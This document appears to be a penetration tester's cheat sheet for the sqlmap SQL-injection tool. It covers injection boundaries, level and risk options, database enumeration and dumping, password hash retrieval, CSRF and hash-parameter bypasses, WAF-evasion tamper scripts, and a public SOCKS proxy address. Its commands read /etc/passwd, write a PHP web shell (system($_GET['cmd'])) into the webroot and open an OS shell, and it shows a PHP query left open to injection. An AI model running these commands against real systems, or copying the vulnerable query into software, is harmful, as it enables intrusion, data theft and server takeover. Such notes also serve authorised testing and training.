search

sqlmap

// sqlmap tips
Display Errors

The first step is usually to switch the --parse-errors,
 to parse the DBMS errors (if any) and displays them as part of the program run:
 
 // The -t option stores the whole traffic content to an output file:
 sqlmap -u "http://www.target.com/vuln.php?id=1" --batch -t /tmp/traffic.txt
 
 // Another useful flag is the -v option, which raises the verbosity level of 
 the console output:
 sqlmap -u "http://www.target.com/vuln.php?id=1" -v 6 --batch
 
 // As we can see, the -v 6 option will directly print all errors and 
 //full HTTP request to the terminal so that we can follow along with everything 
 // SQLMap is doing in real-time.
 
 //Finally, we can utilize the --proxy option to redirect the whole traffic through 
 //a (MiTM) proxy (e.g., Burp). This will route all SQLMap traffic through Burp, 
 //so that we can later manually investigate all requests, repeat them, and 
 //utilize all features of Burp with these requests:
 
 //boundaries (e.g. '<vector>-- -): prefix and suffix formations, 
 // used for proper injection of the vector into the vulnerable SQL statement.
 
 sqlmap -u "www.example.com/?q=test" --prefix="%'))" --suffix="-- -"
 
 // This will result in an enclosure of all vector values between the 
 // static prefix %')) and the suffix -- -.

$query = "SELECT id,name,surname FROM users WHERE id LIKE (('" . $_GET["q"] . "')) 
LIMIT 0,1";
$result = mysqli_query($link, $query);

// 

    The option --level (1-5, default 1) extends both vectors and boundaries being used,
     based on their expectancy of success (i.e., the lower the expectancy, 
     the higher the level).

    The option --risk (1-3, default 1) extends the used vector set based on their risk
     of causing problems at the target side (i.e., risk of database entry loss or 
     denial-of-service).
     
     sqlmap -u www.example.com/?id=1 -v 3 --level=5
     
     // As for the number of payloads, by default (i.e. --level=1 --risk=1), the number of payloads used for testing a single parameter goes up to 72, while in the most detailed case (--level=5 --risk=3) 
     // the number of payloads increases to 7,865.
     
     As for the number of payloads, by default (i.e. --level=1 --risk=1), 

As SQLMap is already tuned to check for the most common boundaries and vectors, 
regular users are advised not to touch these options because it will make 
the whole detection process considerably slower. Nevertheless, in special cases 
of SQLi vulnerabilities, where usage of OR payloads is a must 
(e.g., in case of login pages), we may have to raise the risk level ourselves.

This is because OR payloads are inherently dangerous in a default run, 
where underlying vulnerable SQL statements (although less commonly) 
are actively modifying the database content (e.g. DELETE or UPDATE).

Techniques
 --technique=BEU
 
 

     

Enumeration usually starts with the retrieval of the basic information:

    Database version banner (switch --banner)
    Current user name (switch --current-user)
    Current database name (switch --current-db)
    Checking if the current user has DBA (administrator) rights.
    

// narrow down
sqlmap -u "http://www.example.com/?id=1" --dump -T users -D testdb --start=2 --stop=3

// search table names
// searching tables LIKE 'user'
sqlmap -u "http://www.example.com/?id=1" --search -T user

// search column names
sqlmap -u "http://www.example.com/?id=1" --search -C pass
 
// DB Users Password Enumeration and Cracking
sqlmap -u "http://www.example.com/?id=1" --passwords --batch

//CSRF
sqlmap -u "http://www.example.com/" --data="id=1&csrf-token=WfF1szMUHhiokx9AHFply5L2xAOfjRkE" --csrf-token="csrf-token"

 // unique value bypass
 sqlmap -u "http://www.example.com/?id=1&rp=29125" --randomize=rp --batch -v 5 | grep URI
 
 // Calculated Parameter Bypass
 sqlmap -u "http://www.example.com/?id=1&h=c4ca4238a0b923820dcc509a6f75849b" --eval="import hashlib; h=hashlib.md5(id).hexdigest()" --batch -v 5 | grep URI
 
 
// proxy
--proxy="socks4://177.39.187.70:33283"

// check if DBA
sqlmap -u "http://www.example.com/?id=1" --is-dba

// reading local files
sqlmap -u "http://www.example.com/?id=1" --file-read "/etc/passwd"

// write file
echo '<?php system($_GET["cmd"]); ?>' > shell.php

sqlmap -u "http://www.example.com/?id=1" --file-write "shell.php" --file-dest "/var/www/html/shell.php"

sqlmap -u "http://www.example.com/?id=1" --os-shell

Tamper Scripts

--tamper

Tamper-Script

Description

0eunion

Replaces instances of UNION with e0UNION

base64encode

Base64-encodes all characters in a given payload

between

Replaces greater than operator (>) with NOT BETWEEN 0 AND # and equals operator (=) with BETWEEN # AND #

commalesslimit

Replaces (MySQL) instances like LIMIT M, N with LIMIT N OFFSET M counterpart

equaltolike

Replaces all occurrences of operator equal (=) with LIKE counterpart

halfversionedmorekeywords

Adds (MySQL) versioned comment before each keyword

modsecurityversioned

Embraces complete query with (MySQL) versioned comment

modsecurityzeroversioned

Embraces complete query with (MySQL) zero-versioned comment

percentage

Adds a percentage sign (%) in front of each character (e.g. SELECT -> %S%E%L%E%C%T)

plus2concat

Replaces plus operator (+) with (MsSQL) function CONCAT() counterpart

randomcase

Replaces each keyword character with random case value (e.g. SELECT -> SEleCt)

space2comment

Replaces space character ( ) with comments `/

space2dash

Replaces space character ( ) with a dash comment (--) followed by a random string and a new line ()

space2hash

Replaces (MySQL) instances of space character ( ) with a pound character (#) followed by a random string and a new line ()

space2mssqlblank

Replaces (MsSQL) instances of space character ( ) with a random blank character from a valid set of alternate characters

space2plus

Replaces space character ( ) with plus (+)

space2randomblank

Replaces space character ( ) with a random blank character from a valid set of alternate characters

symboliclogical

Replaces AND and OR logical operators with their symbolic counterparts (&& and ||)

versionedkeywords

Encloses each non-function keyword with (MySQL) versioned comment

versionedmorekeywords

Encloses each keyword with (MySQL) versioned comment

PreviousDecodingNextSessions

Last updated